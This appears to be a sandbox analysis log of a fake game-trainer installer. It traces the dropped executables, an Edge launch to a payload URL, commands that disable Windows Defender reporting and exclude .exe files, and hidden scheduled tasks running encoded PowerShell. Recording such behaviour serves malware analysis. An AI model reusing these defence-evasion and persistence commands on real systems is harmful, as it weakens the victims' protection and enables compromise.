PID 3944 wrote to memory of 1936	3944	trainerv_LbkGolm7.exe	is-BBKOB.tmp
PID 3944 wrote to memory of 1936	3944	trainerv_LbkGolm7.exe	is-BBKOB.tmp
PID 3944 wrote to memory of 1936	3944	trainerv_LbkGolm7.exe	is-BBKOB.tmp
PID 1936 wrote to memory of 3796	1936	is-BBKOB.tmp	net.exe
PID 1936 wrote to memory of 3796	1936	is-BBKOB.tmp	net.exe
PID 1936 wrote to memory of 3796	1936	is-BBKOB.tmp	net.exe
PID 1936 wrote to memory of 4976	1936	is-BBKOB.tmp	CR_DBF.exe
PID 1936 wrote to memory of 4976	1936	is-BBKOB.tmp	CR_DBF.exe
PID 1936 wrote to memory of 4976	1936	is-BBKOB.tmp	CR_DBF.exe
PID 3796 wrote to memory of 3520	3796	net.exe	net1.exe
PID 3796 wrote to memory of 3520	3796	net.exe	net1.exe
PID 3796 wrote to memory of 3520	3796	net.exe	net1.exe
PID 1936 wrote to memory of 1948	1936	is-BBKOB.tmp	net.exe
PID 1936 wrote to memory of 1948	1936	is-BBKOB.tmp	net.exe
PID 1936 wrote to memory of 1948	1936	is-BBKOB.tmp	net.exe
PID 1936 wrote to memory of 1044	1936	is-BBKOB.tmp	CR_DBF.exe
PID 1936 wrote to memory of 1044	1936	is-BBKOB.tmp	CR_DBF.exe
PID 1936 wrote to memory of 1044	1936	is-BBKOB.tmp	CR_DBF.exe
PID 1948 wrote to memory of 4912	1948	net.exe	net1.exe
PID 1948 wrote to memory of 4912	1948	net.exe	net1.exe
PID 1948 wrote to memory of 4912	1948	net.exe	net1.exe
PID 1044 wrote to memory of 5000	1044	CR_DBF.exe	msedge.exe
PID 1044 wrote to memory of 5000	1044	CR_DBF.exe	msedge.exe
PID 5000 wrote to memory of 1288	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 1288	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe
PID 5000 wrote to memory of 5036	5000	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\trainerv_LbkGolm7.exe
"C:\Users\Admin\AppData\Local\Temp\trainerv_LbkGolm7.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3944

C:\Users\Admin\AppData\Local\Temp\is-291MC.tmp\is-BBKOB.tmp
"C:\Users\Admin\AppData\Local\Temp\is-291MC.tmp\is-BBKOB.tmp" /SL4 $501C0 "C:\Users\Admin\AppData\Local\Temp\trainerv_LbkGolm7.exe" 4307273 51712
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1936

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" helpmsg 31
3⤵
- Suspicious use of WriteProcessMemory
PID:3796

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 31
4⤵
PID:3520

C:\Program Files (x86)\CR DBF\CR_DBF.exe
"C:\Program Files (x86)\CR DBF\CR_DBF.exe"
3⤵
- Executes dropped EXE
PID:4976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 868
4⤵
- Program crash
PID:316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 888
4⤵
- Program crash
PID:2032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 1128
4⤵
- Program crash
PID:1228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 140
4⤵
- Program crash
PID:3492

C:\Program Files (x86)\CR DBF\CR_DBF.exe
"C:\Program Files (x86)\CR DBF\CR_DBF.exe" 90028dbf2c86ac153423bad84c9d838a
3⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 848
4⤵
- Program crash
PID:1840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 860
4⤵
- Program crash
PID:4280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 916
4⤵
- Program crash
PID:4168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1052
4⤵
- Program crash
PID:3600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1084
4⤵
- Program crash
PID:4772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1152
4⤵
- Program crash
PID:3808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1148
4⤵
- Program crash
PID:3836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1200
4⤵
- Program crash
PID:4740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1304
4⤵
- Program crash
PID:1904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1284
4⤵
- Program crash
PID:4704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 968
4⤵
- Program crash
PID:852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1612
4⤵
- Program crash
PID:968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1324
4⤵
- Program crash
PID:4236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1736
4⤵
- Program crash
PID:3912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1180
4⤵
- Program crash
PID:3008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1908
4⤵
- Program crash
PID:1160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 2084
4⤵
- Program crash
PID:3116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://setupservice.xyz/eyJ0eXBlIjoxLCJ0Ijo4OTgxNTM0MjAzMDg4NCwibmFtZSI6InRyYWluZXIudi4xLjAuemlwIiwic2lkIjoiMjYwMTkzMzgifQ==
4⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5000

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb8c9646f8,0x7ffb8c964708,0x7ffb8c964718
5⤵
PID:1288

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,9778865514571032121,10765443418618287559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1864

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,9778865514571032121,10765443418618287559,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
5⤵
PID:5036

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,9778865514571032121,10765443418618287559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8
5⤵
PID:4740

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,9778865514571032121,10765443418618287559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1
5⤵
PID:4356

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,9778865514571032121,10765443418618287559,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
5⤵
PID:4636

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,9778865514571032121,10765443418618287559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5716 /prefetch:8
5⤵
PID:3264

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
5⤵
- Drops file in Program Files directory
PID:3288

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff6277c5460,0x7ff6277c5470,0x7ff6277c5480
6⤵
PID:3148

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,9778865514571032121,10765443418618287559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5716 /prefetch:8
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,9778865514571032121,10765443418618287559,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:1
5⤵
PID:1636

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,9778865514571032121,10765443418618287559,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5752 /prefetch:1
5⤵
PID:1104

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,9778865514571032121,10765443418618287559,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1
5⤵
PID:4336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,9778865514571032121,10765443418618287559,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
5⤵
PID:4640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1832
4⤵
- Program crash
PID:1948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1824
4⤵
- Program crash
PID:4280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1832
4⤵
- Program crash
PID:2956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1892
4⤵
- Program crash
PID:2088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1684
4⤵
- Program crash
PID:1452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1884
4⤵
- Program crash
PID:4360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1980
4⤵
- Program crash
PID:3112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1992
4⤵
- Program crash
PID:5004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1976
4⤵
- Program crash
PID:4804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 2000
4⤵
- Program crash
PID:960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 2136
4⤵
- Program crash
PID:1840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 2108
4⤵
- Program crash
PID:912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1860
4⤵
- Program crash
PID:4684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1976
4⤵
- Program crash
PID:3912

C:\Users\Admin\AppData\Local\Temp\RZrd4oP1\PFDXMs1Ymv.exe
C:\Users\Admin\AppData\Local\Temp\RZrd4oP1\PFDXMs1Ymv.exe /VERYSILENT
4⤵
- Executes dropped EXE
PID:2956

C:\Users\Admin\AppData\Local\Temp\is-8O9G1.tmp\is-DNAA5.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8O9G1.tmp\is-DNAA5.tmp" /SL4 $50286 "C:\Users\Admin\AppData\Local\Temp\RZrd4oP1\PFDXMs1Ymv.exe" 2215905 52736 /VERYSILENT
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:2088

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" helpmsg 9
6⤵
PID:5240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 9
7⤵
PID:5632

C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe
"C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe" install
6⤵
- Executes dropped EXE
PID:5252

C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe
"C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe" start
6⤵
- Executes dropped EXE
PID:5864

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" pause Zerkalo331
6⤵
PID:5856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 2108
4⤵
- Program crash
PID:984

C:\Users\Admin\AppData\Local\Temp\52b5G1Yk\mzcc2mvyIAWsNP6.exe
C:\Users\Admin\AppData\Local\Temp\52b5G1Yk\mzcc2mvyIAWsNP6.exe /S /site_id=690689
4⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:1380

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
5⤵
PID:6032

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
6⤵
PID:5152

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gAVsicdDj" /SC once /ST 07:17:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
5⤵
- Creates scheduled task(s)
PID:5616

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
5⤵
PID:5844

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gAVsicdDj"
5⤵
PID:5352

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gAVsicdDj"
5⤵
PID:5524

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bIxjpVXoYOizHLMzgM" /SC once /ST 19:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\FNhEJkUTaeavwqgvk\dtXVaZYpVgtLOQz\mIwgqVf.exe\" js /site_id 690689 /S" /V1 /F
5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5612

C:\Users\Admin\AppData\Local\Temp\OgcjuXn3\2E4pfl7VJy4paYc.exe
C:\Users\Admin\AppData\Local\Temp\OgcjuXn3\2E4pfl7VJy4paYc.exe /m SUB=90028dbf2c86ac153423bad84c9d838a
4⤵
- Executes dropped EXE
PID:2284

C:\Users\Admin\AppData\Local\Temp\is-EDR9I.tmp\is-SVK5I.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EDR9I.tmp\is-SVK5I.tmp" /SL4 $10294 "C:\Users\Admin\AppData\Local\Temp\OgcjuXn3\2E4pfl7VJy4paYc.exe" 1346172 52736 /m SUB=90028dbf2c86ac153423bad84c9d838a
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4704

C:\Users\Admin\AppData\Local\Temp\is-2DP6N.tmp\FileDate46\FileDate46.exe
"C:\Users\Admin\AppData\Local\Temp\is-2DP6N.tmp\FileDate46\FileDate46.exe" /m SUB=90028dbf2c86ac153423bad84c9d838a
6⤵
- Checks computer location settings
- Executes dropped EXE
PID:5228

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "FileDate46.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\is-2DP6N.tmp\FileDate46\FileDate46.exe" & exit
7⤵
PID:5448

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "FileDate46.exe" /f
8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4168

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" helpmsg 26
6⤵
PID:5216

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 26
7⤵
PID:5828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1984
4⤵
- Program crash
PID:2216

C:\Users\Admin\AppData\Local\Temp\gVyujSlN\EmPxeJw8dA.exe
C:\Users\Admin\AppData\Local\Temp\gVyujSlN\EmPxeJw8dA.exe
4⤵
- Executes dropped EXE
PID:5776

C:\Users\Admin\AppData\Local\Temp\is-312NA.tmp\is-O1LR1.tmp
"C:\Users\Admin\AppData\Local\Temp\is-312NA.tmp\is-O1LR1.tmp" /SL4 $30220 "C:\Users\Admin\AppData\Local\Temp\gVyujSlN\EmPxeJw8dA.exe" 1803256 48640
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:6004

C:\Program Files (x86)\BTngBackup\SyncBackupShell.exe
"C:\Program Files (x86)\BTngBackup\SyncBackupShell.exe"
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 2116
4⤵
- Program crash
PID:5340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 2236
4⤵
- Program crash
PID:5496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 2244
4⤵
- Program crash
PID:396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 2128
4⤵
- Program crash
PID:5588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 2236
4⤵
- Program crash
PID:5880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 2188
4⤵
- Program crash
PID:5220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 2156
4⤵
- Program crash
PID:388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1940
4⤵
- Program crash
PID:4520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 2188
4⤵
- Program crash
PID:6136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1824
4⤵
- Program crash
PID:5992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 2248
4⤵
- Program crash
PID:5388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 2184
4⤵
- Program crash
PID:2276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1828
4⤵
- Program crash
PID:5476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 2188
4⤵
- Program crash
PID:5520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1764
4⤵
- Program crash
PID:3060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 1892
4⤵
- Program crash
PID:2896

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" pause ImageComparer45
3⤵
- Suspicious use of WriteProcessMemory
PID:1948

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 pause ImageComparer45
4⤵
PID:4912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4976 -ip 4976
1⤵
PID:868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4976 -ip 4976
1⤵
PID:960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4976 -ip 4976
1⤵
PID:1060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4976 -ip 4976
1⤵
PID:452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1044 -ip 1044
1⤵
PID:1832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1044 -ip 1044
1⤵
PID:4784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1044 -ip 1044
1⤵
PID:5112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1044 -ip 1044
1⤵
PID:4744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1044 -ip 1044
1⤵
PID:4360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1044 -ip 1044
1⤵
PID:2956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1044 -ip 1044
1⤵
PID:2288

C:\Windows\SysWOW64\WerFault.exe
